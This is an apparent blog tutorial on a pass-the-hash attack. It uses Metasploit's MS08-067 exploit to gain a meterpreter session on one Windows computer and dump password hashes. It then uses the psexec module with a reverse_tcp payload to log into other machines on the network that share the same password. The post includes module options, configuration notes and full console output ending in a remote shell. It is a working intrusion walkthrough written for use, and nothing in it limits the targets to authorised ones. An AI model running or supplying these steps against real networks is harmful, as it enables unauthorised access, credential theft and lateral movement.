Using PsEXEC with Metasploit to Login Using Password Hash

Using PsEXEC with Metasploit to Login Using Password Hash


Type: Tutorial

Level: Medium, Advanced

The main problem of people nowadays with password it's hard to remember, that's why they usually put the same password for every account and even for every device they have. For example if you're in school, university, or office when they have a lot of computer, it's impossible to give different password to every computer especially when the person who use the computer are not familiar with computer, that's why usually they use same password for all of the computer, because when there's some problem happen, the IT person will try to maintain it or remote it using template password they already provided.

In this tutorial, we will compromise one victim computer and then get their password hash, after that we log in into another computer(with the same password) by using password hash, no need to cracking the password first to plain text 🙂


Requirement :

1. Metasploit Framework

2. Linux Operating System or Backtrack 5(Metasploit framework already included inside this distro)

Step By Step Using PsEXEC with Metasploit to Login Using Password Hash:

1. First of all you should have vulnerable target, and then set your payload to run meterpreter when the exploit successfully launched. You can view my previous post about meterpreter search(see on step 1). In this example I use exploit/windows/smb/ms08_067_netapi exploit.

Using PsEXEC with Metasploit to Login Using Password Hash

2. After successfully inside victim computer, we will get the password hash.

FYI : in this case I will use the username : victim and assume that all username in that place is also victim(but it's usually using username : Administrator)

using psexec with metasploit to login using password hash

3. Okay, after we get the victim password hashes, we will try to connect to another victim that "maybe" use the same password(or maybe they are in the same network :-p ). I will use psexec here and set the payload to use meterpreter reverse_tcp.

using psexec with metasploit to login using password hash

4. You can take a look what options does this exploit and payload has by running show options.

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Information :

RHOST = remote host or target ip address

SMBPass = password hash

SMBUser = username

LHOST = our local computer use to attack

5. That's the options we need to set up and below is my configuration on my backtrack 5 box.

using psexec with metasploit to login using password hash

6. After everything is set up correctly, then launch the exploit command.

msf exploit(psexec) > exploit

[*] Started reverse handler on 
[*] Connecting to the server...
[*] Authenticating to|WORKGROUP as user 'victim'...
[*] Uploading payload...
[*] Created \hMnZxVRG.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hMnZxVRG.exe...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2011-07-16 01:26:24 +0800

meterpreter > shell
Process 1876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


Below is my screenshot :

using psexec with metasploit to login using password hash

Thats it! We're already on another computer. We successfully connect to a seperate computer with the same credentials without having to worry about cracking the password.

hope it's useful.

Share this article if you found it was useful:

Blogger at

See all posts by || Visit Website :